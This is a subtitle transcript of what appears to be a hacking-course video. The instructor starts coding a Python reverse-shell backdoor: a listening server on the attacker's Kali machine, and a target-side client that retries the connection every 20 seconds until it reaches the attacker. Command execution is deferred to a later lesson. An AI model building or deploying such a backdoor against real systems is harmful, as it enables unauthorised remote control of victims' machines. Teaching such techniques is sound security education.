1
00:00:00,360 --> 00:00:01,500
-: Welcome back.

2
00:00:01,500 --> 00:00:04,140
Time to start coding our back door.

3
00:00:04,140 --> 00:00:06,450
So in this video we're going to start

4
00:00:06,450 --> 00:00:08,550
with the base of our program.

5
00:00:08,550 --> 00:00:11,610
Remember that we must create 2 different programs,

6
00:00:11,610 --> 00:00:14,250
a server and a back door.

7
00:00:14,250 --> 00:00:16,470
And it doesn't matter with which one we start.

8
00:00:16,470 --> 00:00:20,640
So let's, in this case start coding the server first.

9
00:00:20,640 --> 00:00:23,760
We're going to code both of them simultaneously.

10
00:00:23,760 --> 00:00:27,180
So what I'm going to do is I'm going to open the terminal.

11
00:00:27,180 --> 00:00:29,610
And remember that we have this tools directory

12
00:00:29,610 --> 00:00:31,170
from the first project.

13
00:00:31,170 --> 00:00:34,650
Let us navigate to there, and instead of the port scanner

14
00:00:34,650 --> 00:00:36,540
we're going to make another sub directory

15
00:00:36,540 --> 00:00:39,363
inside of here and call this back door.

16
00:00:40,350 --> 00:00:42,210
Then we're going to change the directory

17
00:00:42,210 --> 00:00:44,190
to the sub directory, and here we are going

18
00:00:44,190 --> 00:00:46,290
to code our tools.

19
00:00:46,290 --> 00:00:49,470
So as I said, let's start with server first.

20
00:00:49,470 --> 00:00:52,290
To do that we type server.py.

21
00:00:52,290 --> 00:00:54,720
We open it using nano and here

22
00:00:54,720 --> 00:00:57,270
we're going to code our project.

23
00:00:57,270 --> 00:01:00,360
So what's the first thing that we must do?

24
00:01:00,360 --> 00:01:03,900
Well, since these 2 programs are going to communicate

25
00:01:03,900 --> 00:01:07,620
with one another, they must establish a connection first.

26
00:01:07,620 --> 00:01:09,780
And we know that we can do that

27
00:01:09,780 --> 00:01:13,110
with the help of a socket library.

28
00:01:13,110 --> 00:01:16,260
So socket allows us to initiate an internet connection

29
00:01:16,260 --> 00:01:18,210
between 2 machines.

30
00:01:18,210 --> 00:01:19,860
So how are we going to do that?

31
00:01:19,860 --> 00:01:22,500
Well, first thing that we must do

32
00:01:22,500 --> 00:01:24,780
and that we also did inside of our report scanner

33
00:01:24,780 --> 00:01:28,380
is we must initiate a socket object.

34
00:01:28,380 --> 00:01:31,440
And I'm going to call my socket object sock

35
00:01:31,440 --> 00:01:33,510
inside of the server.py

36
00:01:33,510 --> 00:01:36,450
and to initiate it I will type socket.socket.

37
00:01:36,450 --> 00:01:37,740
So we are doing this with the help

38
00:01:37,740 --> 00:01:39,720
of the socket library and here

39
00:01:39,720 --> 00:01:42,930
in the brackets we want to specify 2 different parameters,

40
00:01:42,930 --> 00:01:45,123
socket.AF_INET,

41
00:01:46,793 --> 00:01:50,340
socket.SOCK_STREAM.

42
00:01:50,340 --> 00:01:51,690
And I know what you're thinking.

43
00:01:51,690 --> 00:01:54,090
What even are these arguments?

44
00:01:54,090 --> 00:01:58,140
Well, this socket.AF_INET tells our program

45
00:01:58,140 --> 00:01:59,760
that we are going to make a connection

46
00:01:59,760 --> 00:02:02,130
over IPv4 address.

47
00:02:02,130 --> 00:02:05,010
And this socket.SOCK_STREAM tells our program

48
00:02:05,010 --> 00:02:08,100
that we're going to use the TCP connection.

49
00:02:08,100 --> 00:02:09,840
So simple as that.

50
00:02:09,840 --> 00:02:12,330
Now the next thing that we want to do is we want

51
00:02:12,330 --> 00:02:15,900
to bind the ip address and the port.

52
00:02:15,900 --> 00:02:17,520
This is something that we already did inside

53
00:02:17,520 --> 00:02:20,400
of our first project, so there's nothing really too much

54
00:02:20,400 --> 00:02:21,233
to explain right here.

55
00:02:21,233 --> 00:02:25,470
We just type sock and use the method .bind,

56
00:02:25,470 --> 00:02:27,540
open 2 and close 2 brackets.

57
00:02:27,540 --> 00:02:30,540
And the first parameter is going to be the ip address

58
00:02:30,540 --> 00:02:32,280
of our cal Linux machine.

59
00:02:32,280 --> 00:02:34,773
In my case, if I go and check it out,

60
00:02:36,120 --> 00:02:38,160
this is .1.12.

61
00:02:38,160 --> 00:02:42,930
So we'll go right here and specify 192.68.1.12

62
00:02:42,930 --> 00:02:44,070
as the first parameter.

63
00:02:44,070 --> 00:02:47,640
And remember it must be between the quotes.

64
00:02:47,640 --> 00:02:49,410
Then I will specify ,

65
00:02:49,410 --> 00:02:51,030
and the port that we are going to use,

66
00:02:51,030 --> 00:02:53,910
well, we can just go with port 5555.

67
00:02:53,910 --> 00:02:54,743
Why not?

68
00:02:54,743 --> 00:02:56,433
It doesn't even matter to be honest.

69
00:02:57,360 --> 00:03:00,123
After we do all of this, we binded the ip address

70
00:03:00,123 --> 00:03:01,380
with the port.

71
00:03:01,380 --> 00:03:03,210
And now the next thing that we must do

72
00:03:03,210 --> 00:03:06,900
is we must start listening for the incoming connections.

73
00:03:06,900 --> 00:03:09,810
Remember this was the crucial part in the reverse shells.

74
00:03:09,810 --> 00:03:11,520
The target executes the payload

75
00:03:11,520 --> 00:03:14,550
but we must listen for the incoming connections.

76
00:03:14,550 --> 00:03:17,340
And that is exactly what our server program will do.

77
00:03:17,340 --> 00:03:19,470
It will listen for the connections and

78
00:03:19,470 --> 00:03:21,450
once the target executes a payload,

79
00:03:21,450 --> 00:03:24,660
they will connect to our server program.

80
00:03:24,660 --> 00:03:28,350
So to do that, we can first print like this,

81
00:03:28,350 --> 00:03:33,350
let us print Listening For The Incoming Connections

82
00:03:34,500 --> 00:03:37,710
just so we know at which part of the program we are.

83
00:03:37,710 --> 00:03:42,090
And below that we can type sock.listen

84
00:03:42,090 --> 00:03:44,640
and we are going to specify 5 in the brackets,

85
00:03:44,640 --> 00:03:46,230
meaning that we're going to listen

86
00:03:46,230 --> 00:03:48,150
up to 5 different connections.

87
00:03:48,150 --> 00:03:51,480
Okay, so our program will now be stuck on this

88
00:03:51,480 --> 00:03:54,750
part until the connection is established.

89
00:03:54,750 --> 00:03:57,450
Once the target tries to connect back to us

90
00:03:57,450 --> 00:04:00,990
we need to store their connection in a few variables.

91
00:04:00,990 --> 00:04:03,570
In other sense, we need to store their socket object

92
00:04:03,570 --> 00:04:06,270
that we're going to use to communicate with the target

93
00:04:08,519 --> 00:04:11,130
and we're also going to split that into an ip address.

94
00:04:11,130 --> 00:04:13,110
So what I'm going to do is I'm going

95
00:04:13,110 --> 00:04:15,780
to type target, ip.

96
00:04:15,780 --> 00:04:18,630
These are going to be 2 separate variables

97
00:04:18,630 --> 00:04:22,019
and they're going to be equal to sock.accept.

98
00:04:22,019 --> 00:04:24,510
And this accept method is simply just

99
00:04:24,510 --> 00:04:28,140
accepting the incoming connection and storing the target's

100
00:04:28,140 --> 00:04:31,320
socket object right here and the ip address

101
00:04:31,320 --> 00:04:33,330
in the second variable.

102
00:04:33,330 --> 00:04:34,593
Simple as that.

103
00:04:35,520 --> 00:04:39,060
Once we do that and once the connection is accepted

104
00:04:39,060 --> 00:04:44,060
we can print that Target Connected

105
00:04:44,280 --> 00:04:46,230
and we can add From.

106
00:04:46,230 --> 00:04:48,030
And what we are going to do here is we are going

107
00:04:48,030 --> 00:04:52,620
to close the quote and add a + sign and then the string

108
00:04:52,620 --> 00:04:54,960
of the ip variable.

109
00:04:54,960 --> 00:04:57,690
And once again, remember the ip variable will store

110
00:04:57,690 --> 00:04:59,610
the ip address of the target.

111
00:04:59,610 --> 00:05:01,350
So what we are essentially doing right here

112
00:05:01,350 --> 00:05:03,690
is we're printing that we got the connection

113
00:05:03,690 --> 00:05:05,820
from the target's ip address.

114
00:05:05,820 --> 00:05:10,140
Okay, we need to close one more bracket right here.

115
00:05:10,140 --> 00:05:12,420
And what we're going to do at the end

116
00:05:12,420 --> 00:05:14,250
is we're just going to enter a function

117
00:05:14,250 --> 00:05:15,650
called target_communication.

118
00:05:17,010 --> 00:05:18,960
Now of course this function doesn't exist and

119
00:05:18,960 --> 00:05:21,060
we're going to code it in some future video.

120
00:05:21,060 --> 00:05:23,910
But for now let's just leave it right here.

121
00:05:23,910 --> 00:05:26,610
We successfully created a socket object,

122
00:05:26,610 --> 00:05:29,040
binded the ip address with the port.

123
00:05:29,040 --> 00:05:31,230
We listened for the incoming connections

124
00:05:31,230 --> 00:05:33,930
and at the end we accepted the connection

125
00:05:33,930 --> 00:05:35,940
from our target system.

126
00:05:35,940 --> 00:05:38,280
We're going to leave it at this for now

127
00:05:38,280 --> 00:05:39,780
on our server program.

128
00:05:39,780 --> 00:05:43,230
And let's go to our backdoor program.

129
00:05:43,230 --> 00:05:46,590
Now we need to figure out the code for our backdoor

130
00:05:46,590 --> 00:05:50,460
to make it connect to our server.py.

131
00:05:50,460 --> 00:05:52,530
So first thing that we're going to do is

132
00:05:52,530 --> 00:05:57,530
of course to import the socket library.

133
00:05:58,230 --> 00:06:00,480
Then as in the server program

134
00:06:00,480 --> 00:06:02,520
we need to initiate the socket object.

135
00:06:02,520 --> 00:06:04,740
And I'm not going to call it sock right here,

136
00:06:04,740 --> 00:06:06,930
I'm just going to call it s.

137
00:06:06,930 --> 00:06:09,660
And here we're going to specify the same parameters,

138
00:06:09,660 --> 00:06:12,093
socket.AF_INET,

139
00:06:13,278 --> 00:06:15,663
socket.SOCK_STREAM.

140
00:06:16,680 --> 00:06:18,540
We already explained what these are.

141
00:06:18,540 --> 00:06:20,610
And the only thing that we need to do right here

142
00:06:20,610 --> 00:06:23,760
is we need to connect to our target machine.

143
00:06:23,760 --> 00:06:26,730
But we're not going to use the connect method right here.

144
00:06:26,730 --> 00:06:28,230
What we are going to do is we are going

145
00:06:28,230 --> 00:06:30,840
to call the connection function.

146
00:06:30,840 --> 00:06:33,030
And of course this is a function that doesn't exist.

147
00:06:33,030 --> 00:06:35,220
So we must code it up here.

148
00:06:35,220 --> 00:06:36,510
Let's define it first.

149
00:06:36,510 --> 00:06:37,770
So define connection.

150
00:06:37,770 --> 00:06:40,680
It will take no parameters between the brackets.

151
00:06:40,680 --> 00:06:43,260
And what we are going to do is we are going

152
00:06:43,260 --> 00:06:46,680
to type right here, try, which is the try statement.

153
00:06:46,680 --> 00:06:50,580
So it will try to connect to our cal Linux machine.

154
00:06:50,580 --> 00:06:53,220
And remember the connect function requires 2 open and

155
00:06:53,220 --> 00:06:54,960
2 closed brackets the same way

156
00:06:54,960 --> 00:06:56,280
that the bind function does.

157
00:06:56,280 --> 00:06:59,640
And it also takes 2 parameters, which the first one

158
00:06:59,640 --> 00:07:03,060
is the ip address of the machine that we want to connect to.

159
00:07:03,060 --> 00:07:04,350
So this will be the ip address

160
00:07:04,350 --> 00:07:06,210
of cal Linux machine once again.

161
00:07:06,210 --> 00:07:09,420
And the port will be once again the port 5555

162
00:07:09,420 --> 00:07:11,700
because we want to connect to that port,

163
00:07:11,700 --> 00:07:15,780
since our server program will be listening on that port.

164
00:07:15,780 --> 00:07:18,750
If it manages to connect, we're going to enter

165
00:07:18,750 --> 00:07:21,870
a second function which is going to be called shell.

166
00:07:21,870 --> 00:07:24,360
And this shell function also doesn't exist.

167
00:07:24,360 --> 00:07:26,700
We're going to code it and what will be the purpose

168
00:07:26,700 --> 00:07:29,820
of this shell function is executing the commands.

169
00:07:29,820 --> 00:07:32,250
So for now on, we're just going to leave it right here,

170
00:07:32,250 --> 00:07:34,920
and we're going to code it later.

171
00:07:34,920 --> 00:07:36,693
Once we leave the shell function, we can close

172
00:07:36,693 --> 00:07:40,323
this socket object and in the except statement,

173
00:07:41,310 --> 00:07:43,170
we can call again

174
00:07:43,170 --> 00:07:45,960
this connection function.

175
00:07:45,960 --> 00:07:49,110
Now you might be wondering why are we doing this?

176
00:07:49,110 --> 00:07:52,560
Well if I add something like this right here.

177
00:07:52,560 --> 00:07:55,083
So I go and type while True,

178
00:07:56,130 --> 00:07:58,470
which is remember the infinite loop

179
00:07:58,470 --> 00:08:01,620
and I tab all of these commands once

180
00:08:01,620 --> 00:08:03,873
so they can belong to the while True loop.

181
00:08:04,770 --> 00:08:06,930
And right here I'm going to also

182
00:08:06,930 --> 00:08:09,120
add a statement, time.sleep.

183
00:08:09,120 --> 00:08:11,340
And gimme just one second, I will explain

184
00:08:11,340 --> 00:08:13,050
why I'm doing this.

185
00:08:13,050 --> 00:08:15,570
Let me just code the function till the end.

186
00:08:15,570 --> 00:08:19,800
I will break right here and I will import the time library

187
00:08:19,800 --> 00:08:23,070
because we are going to need it since we use it right here.

188
00:08:23,070 --> 00:08:25,500
So what are we doing right here?

189
00:08:25,500 --> 00:08:27,930
We're calling the connection function.

190
00:08:27,930 --> 00:08:32,159
This connection function starts an infinite while True loop.

191
00:08:32,159 --> 00:08:35,400
This infinite while True loop sleeps for 20 seconds,

192
00:08:35,400 --> 00:08:39,090
and then it tries to connect to our cal Linux machine.

193
00:08:39,090 --> 00:08:42,270
If it manages to connect, it will go inside

194
00:08:42,270 --> 00:08:44,850
of the shell function where we will execute the commands

195
00:08:44,850 --> 00:08:46,170
on the target system.

196
00:08:46,170 --> 00:08:48,930
If it doesn't manage to connect, it will go

197
00:08:48,930 --> 00:08:51,600
into this except statement and it will call

198
00:08:51,600 --> 00:08:54,270
the same function once again.

199
00:08:54,270 --> 00:08:56,220
So, what does this tell you?

200
00:08:56,220 --> 00:08:59,100
It will run this function infinitely

201
00:08:59,100 --> 00:09:01,680
until it manages to connect.

202
00:09:01,680 --> 00:09:04,020
So this is good because of one reason.

203
00:09:04,020 --> 00:09:06,600
We don't want our target to start the payload

204
00:09:06,600 --> 00:09:08,400
and not be able to connect

205
00:09:08,400 --> 00:09:11,370
just because we haven't started the server yet.

206
00:09:11,370 --> 00:09:12,690
We want to be able to connect

207
00:09:12,690 --> 00:09:15,360
to the target system whenever we want.

208
00:09:15,360 --> 00:09:18,720
So this function will tell the payload to try to connect

209
00:09:18,720 --> 00:09:20,940
to every 20 seconds.

210
00:09:20,940 --> 00:09:23,670
Every 20 seconds while their machine is running,

211
00:09:23,670 --> 00:09:26,760
this program will try to connect our cal Linux machine.

212
00:09:26,760 --> 00:09:29,490
So we can start the server at any point of time,

213
00:09:29,490 --> 00:09:33,840
and after 20 seconds it will establish a connection to us.

214
00:09:33,840 --> 00:09:38,250
So this is just calling this function over and over again

215
00:09:38,250 --> 00:09:42,720
until this line right here works, and they connect to us.

216
00:09:42,720 --> 00:09:46,413
Then we enter a second function which is the shell function.

217
00:09:47,340 --> 00:09:51,150
Okay, this is the base of our backdoor.py.

218
00:09:51,150 --> 00:09:53,700
Here is how we are going to connect to our server.

219
00:09:53,700 --> 00:09:56,340
And in the next video we're going to see

220
00:09:56,340 --> 00:09:58,470
what we're going to do with the contents

221
00:09:58,470 --> 00:10:00,120
of the shell function,

222
00:10:00,120 --> 00:10:02,590
and if I save this control O

223
00:10:03,600 --> 00:10:06,930
and also the target communication function.

224
00:10:06,930 --> 00:10:08,790
So these are the functions that will receive

225
00:10:08,790 --> 00:10:11,130
and execute commands.

226
00:10:11,130 --> 00:10:13,740
Feel free to post any question if you have about the code.

227
00:10:13,740 --> 00:10:16,050
If there is something that you do not understand.

228
00:10:16,050 --> 00:10:18,750
And in the next lecture we are going to continue

229
00:10:18,750 --> 00:10:21,240
with the coding of our programs.

230
00:10:21,240 --> 00:10:22,073
See you there.